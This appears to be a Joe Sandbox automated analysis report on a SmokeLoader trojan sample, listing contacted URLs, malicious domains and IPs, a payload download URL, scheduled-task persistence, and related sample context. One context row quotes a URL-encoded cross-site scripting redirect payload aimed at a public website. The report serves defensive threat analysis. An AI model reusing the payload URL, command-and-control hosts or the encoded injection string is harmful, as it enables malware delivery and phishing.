https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	URL Reputation	safe
https://powerpoint.office.comcember	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	0%	URL Reputation	safe
https://word.office.com	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
https://api.msn.com/	0%	URL Reputation	safe
https://support.mozilla.org	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	0%	URL Reputation	safe
https://calvinandhalls.com/application/x-www-form-urlencodedMozilla/5.0	0%	Virustotal		Browse
https://calvinandhalls.com/	0%	Virustotal		Browse
https://23.145.40.164/ksa9104.exe	0%	Virustotal		Browse
https://aka.ms/odirmr	0%	Virustotal		Browse
https://calvinandhalls.com/search.phpMozilla/5.0	0%	Virustotal		Browse
http://unicea.ws/tmp/index.php	0%	Virustotal		Browse
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	0%	Virustotal		Browse
https://calvinandhalls.com/search.php	0%	Virustotal		Browse
http://nwgrus.ru/tmp/index.php	16%	Virustotal		Browse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	0%	Virustotal		Browse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	0%	Virustotal		Browse
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg	0%	Virustotal		Browse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark	0%	Virustotal		Browse
https://api.msn.com/q	0%	Virustotal		Browse
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	0%	Virustotal		Browse
https://calvinandhalls.com/earch.php	0%	Virustotal		Browse
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	0%	Virustotal		Browse
https://wns.windows.com/L	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
calvinandhalls.com	23.145.40.162	true	true	5%, Virustotal, Browse	unknown
bg.microsoft.map.fastly.net	199.232.210.172	true	false	0%, Virustotal, Browse	unknown
nwgrus.ru	190.219.117.240	true	true	12%, Virustotal, Browse	unknown
globalviewsnature.com	23.145.40.113	true	true		unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://23.145.40.164/ksa9104.exe	true	0%, Virustotal, Browse	unknown
http://unicea.ws/tmp/index.php	true	0%, Virustotal, Browse	unknown
http://nwgrus.ru/tmp/index.php	true	16%, Virustotal, Browse	unknown
https://calvinandhalls.com/search.php	true	0%, Virustotal, Browse	unknown
http://tech-servers.in.net/tmp/index.php	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://calvinandhalls.com/	explorer.exe, 0000000B.00000002.2707106638.0000000000980000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2707106638.00000000009E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2707106638.0000000000A0B000.00000004.00000020.00020000.00000000.sdmp	true	0%, Virustotal, Browse	unknown
https://aka.ms/odirmr	explorer.exe, 00000001.00000000.1762089358.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://duckduckgo.com/chrome_newtab	explorer.exe, 0000000B.00000003.2680145906.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, A4FF.tmp.11.dr	false	URL Reputation: safe URL Reputation: safe	unknown
https://calvinandhalls.com/application/x-www-form-urlencodedMozilla/5.0	explorer.exe, 0000000B.00000002.2707106638.00000000009E6000.00000004.00000020.00020000.00000000.sdmp	true	0%, Virustotal, Browse	unknown
https://duckduckgo.com/ac/?q=	explorer.exe, 0000000B.00000003.2680145906.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, A4FF.tmp.11.dr	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://calvinandhalls.com/search.phpMozilla/5.0	explorer.exe, 0000000B.00000002.2707106638.0000000000980000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2667025183.0000000000E78000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.4176755346.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4176575408.0000000001318000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.4176400478.0000000000827000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.4176402726.00000000013C8000.00000004.00000020.00020000.00000000.sdmp	true	0%, Virustotal, Browse	unknown
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl	explorer.exe, 00000001.00000000.1762089358.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://powerpoint.office.comcember	explorer.exe, 00000001.00000000.1765842009.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1763817484.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-	explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	explorer.exe, 0000000B.00000003.2680145906.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, A4FF.tmp.11.dr	false	URL Reputation: safe	unknown
https://excel.office.com	explorer.exe, 00000001.00000000.1765842009.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	451E.exe, 00000009.00000002.4177703163.000002E002E77000.00000004.00000020.00020000.00000000.sdmp, 451E.exe, 00000009.00000003.4155384339.000002E004C26000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.micro	explorer.exe, 00000001.00000000.1764575122.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1763344774.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1762910279.0000000007F40000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we	explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	explorer.exe, 00000001.00000000.1762089358.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	451E.exe, 00000009.00000003.4155384339.000002E004C02000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://calvinandhalls.com/5	explorer.exe, 0000000B.00000002.2707106638.0000000000980000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	explorer.exe, 0000000B.00000003.2680145906.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, A4FF.tmp.11.dr	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi	explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/q	explorer.exe, 00000001.00000000.1763817484.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc	explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000001.00000000.1765842009.000000000C893000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1	explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg	explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark	explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A	explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1762089358.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://calvinandhalls.com/earch.php	explorer.exe, 0000000B.00000002.2707106638.00000000009E2000.00000004.00000020.00020000.00000000.sdmp	true	0%, Virustotal, Browse	unknown
https://wns.windows.com/L	explorer.exe, 00000001.00000000.1765842009.000000000C557000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://word.office.com	explorer.exe, 00000001.00000000.1765842009.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17pot	451E.exe, 00000009.00000002.4177606675.000002E002E44000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	explorer.exe, 0000000B.00000003.2680145906.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, A4FF.tmp.11.dr	false	0%, Virustotal, Browse	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	explorer.exe, 00000001.00000000.1762089358.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent	explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	explorer.exe, 0000000B.00000003.2680145906.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, A4FF.tmp.11.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	451E.exe, 00000009.00000002.4176613175.000002E002E1E000.00000004.00000020.00020000.00000000.sdmp, 451E.exe, 00000009.00000003.4155384339.000002E004C26000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	explorer.exe, 0000000B.00000003.2680145906.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, A4FF.tmp.11.dr	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	451E.exe, 00000009.00000002.4176613175.000002E002DCC000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/Vh5j3k	explorer.exe, 00000001.00000000.1762089358.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://ac.ecosia.org/autocomplete?q=	explorer.exe, 0000000B.00000003.2680145906.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, A4FF.tmp.11.dr	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/v1/news/Feed/Windows?&	explorer.exe, 00000001.00000000.1763817484.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg	explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://support.moz	451E.exe, 00000009.00000003.4168022466.000002E004F29000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://calvinandhalls.com/p	explorer.exe, 0000000B.00000002.2707106638.0000000000980000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://www.rd.com/list/polite-habits-campers-dislike/	explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000001.00000000.1765842009.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar	explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	explorer.exe, 00000001.00000000.1762089358.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/	explorer.exe, 00000001.00000000.1763817484.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d	explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://support.mozilla.org	451E.exe, 00000009.00000003.4168022466.000002E004F22000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://outlook.com_	explorer.exe, 00000001.00000000.1765842009.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	451E.exe, 00000009.00000003.4155384339.000002E004C02000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	explorer.exe, 0000000B.00000003.2680145906.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, A4FF.tmp.11.dr	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com:443/en-us/feed	explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at	explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of	explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
201.212.52.197	unknown	Argentina	10481	TelecomArgentinaSAAR	true
190.219.117.240	nwgrus.ru	Panama	18809	CableOndaPA	true
23.145.40.164	unknown	Reserved	22631	SURFAIRWIRELESS-IN-01US	true
23.145.40.162	calvinandhalls.com	Reserved	22631	SURFAIRWIRELESS-IN-01US	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1524644
Start date and time:	2024-10-03 02:51:04 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	43
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	v173TV3V11.exe renamed because original name is a hash value
Original Sample Name:	c108169f00ff9c5ad6fa70df9137e44a.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@81/14@6/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 162 Number of non-executed functions: 86
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ocsp.edge.digicert.com, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
01:52:23	Task Scheduler	Run new task: Firefox Default Browser Agent 31EA40A44D442C4F path: C:\Users\user\AppData\Roaming\bsjhhuh
01:53:17	Task Scheduler	Run new task: Firefox Default Browser Agent EBB3874FD7AB522A path: C:\Users\user\AppData\Roaming\vejhhuh
20:52:22	API Interceptor	351348x Sleep call for process: explorer.exe modified
20:53:34	API Interceptor	14x Sleep call for process: WMIC.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
201.212.52.197	yEIhhlohep.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	100xmargin.com/tmp/index.php
23.145.40.164	0k3ibTiMjy.exe	Get hash	malicious	SmokeLoader	Browse
	qg5Ddf4an9.exe	Get hash	malicious	SmokeLoader	Browse
	aZPm0tHPTX.exe	Get hash	malicious	SmokeLoader	Browse
	file.exe	Get hash	malicious	SmokeLoader	Browse
	OCYe9qcxiM.exe	Get hash	malicious	SmokeLoader	Browse
	file.exe	Get hash	malicious	SmokeLoader	Browse
	file.exe	Get hash	malicious	SmokeLoader	Browse
	KTh1gQlT9a.exe	Get hash	malicious	SmokeLoader	Browse
	file.exe	Get hash	malicious	SmokeLoader	Browse
	YPDi0gRMHU.exe	Get hash	malicious	SmokeLoader	Browse
23.145.40.162	0k3ibTiMjy.exe	Get hash	malicious	SmokeLoader	Browse
	qg5Ddf4an9.exe	Get hash	malicious	SmokeLoader	Browse
	aZPm0tHPTX.exe	Get hash	malicious	SmokeLoader	Browse
	file.exe	Get hash	malicious	SmokeLoader	Browse
	OCYe9qcxiM.exe	Get hash	malicious	SmokeLoader	Browse
	file.exe	Get hash	malicious	SmokeLoader	Browse
	file.exe	Get hash	malicious	SmokeLoader	Browse
	KTh1gQlT9a.exe	Get hash	malicious	SmokeLoader	Browse
	file.exe	Get hash	malicious	SmokeLoader	Browse
	YPDi0gRMHU.exe	Get hash	malicious	SmokeLoader	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
nwgrus.ru	0k3ibTiMjy.exe	Get hash	malicious	SmokeLoader	Browse	189.61.54.32
	qg5Ddf4an9.exe	Get hash	malicious	SmokeLoader	Browse	181.52.122.51
	aZPm0tHPTX.exe	Get hash	malicious	SmokeLoader	Browse	187.131.253.169
	file.exe	Get hash	malicious	SmokeLoader	Browse	196.189.156.245
	k8JAXb3Lhs.exe	Get hash	malicious	SmokeLoader	Browse	78.89.199.216
	OCYe9qcxiM.exe	Get hash	malicious	SmokeLoader	Browse	187.228.112.175
	file.exe	Get hash	malicious	SmokeLoader	Browse	190.249.193.233
	file.exe	Get hash	malicious	SmokeLoader	Browse	210.182.29.70
	KTh1gQlT9a.exe	Get hash	malicious	SmokeLoader	Browse	116.58.10.60
	file.exe	Get hash	malicious	SmokeLoader	Browse	190.13.174.94
bg.microsoft.map.fastly.net	cleu.cmD	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://73214625721684432150.duckdns.org/home.php	Get hash	malicious	Unknown	Browse	199.232.214.172
	http://fpnc.vnvrff.com/	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://www.florenceco.org/offices/elected/solicitor/docket.php?area=florence%22%3E%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%2E%6A%70%67%22%20%6F%6E%65%72%72%6F%72%3D%22%76%61%72%20%75%72%6C%31%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%20%76%61%72%20%75%72%6C%32%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%76%61%72%20%75%72%6C%20%3D%20%5B%27%68%74%27%2C%27%74%70%27%2C%27%73%3A%2F%2F%76%27%2C%27%61%75%6C%27%2C%27%74%64%6F%27%2C%27%72%65%73%2E%63%27%2C%27%6F%6D%2F%30%2F%27%2C%27%30%2F%30%2F%27%2C%27%34%33%66%66%27%2C%27%35%63%62%35%27%2C%27%63%36%27%2C%27%32%65%27%2C%27%32%66%38%64%31%27%2C%27%31%63%61%33%38%38%27%2C%27%65%34%37%35%62%36%27%2C%27%63%34%36%2F14/392-16513/1254-3178-27524%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%20%75%72%6C%20%3D%20%75%72%6C%2E%72%65%70%6C%61%63%65%28%2F%2C%2F%67%2C%20%27%27%29%3B%20%76%61%72%20%77%69%6E%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%75%72%6C%2C%20%27%5F%73%65%6C%66%27%29%3B%20%77%69%6E%2E%6F%70%65%6E%65%72%20%3D%20%6E%75%6C%6C%3B%20%77%69%6E%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%75%72%6C%29%3B%22%3E	Get hash	malicious	Phisher	Browse	199.232.214.172
	https://porn-app.com/download2	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172
	qg5Ddf4an9.exe	Get hash	malicious	SmokeLoader	Browse	199.232.210.172
	LnK0dS8jcA.exe	Get hash	malicious	Xmrig	Browse	199.232.210.172
	Lys2hJAvd1.exe	Get hash	malicious	RedLine	Browse	199.232.210.172
	gLKtR4HuEw.exe	Get hash	malicious	RedLine	Browse	199.232.214.172
	https://www.kisa.link/dANpz	Get hash	malicious	Phisher	Browse	199.232.210.172
calvinandhalls.com	0k3ibTiMjy.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	qg5Ddf4an9.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	aZPm0tHPTX.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	OCYe9qcxiM.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	KTh1gQlT9a.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	YPDi0gRMHU.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TelecomArgentinaSAAR	yakov.arm7.elf	Get hash	malicious	Mirai	Browse	190.193.239.205
	novo.mips.elf	Get hash	malicious	Mirai, Moobot	Browse	152.171.235.125
	novo.ppc.elf	Get hash	malicious	Mirai, Moobot	Browse	181.167.249.26
	novo.ppc440fp.elf	Get hash	malicious	Mirai, Moobot	Browse	181.228.0.241
	novo.sh4.elf	Get hash	malicious	Mirai, Moobot	Browse	181.29.210.0
	novo.spc.elf	Get hash	malicious	Mirai, Moobot	Browse	181.9.101.236
	yakov.spc.elf	Get hash	malicious	Mirai	Browse	181.107.207.118
	4EtLXn5pqI.exe	Get hash	malicious	SmokeLoader	Browse	200.45.93.45
	SecuriteInfo.com.Linux.Siggen.9999.11593.30273.elf	Get hash	malicious	Unknown	Browse	181.31.213.25
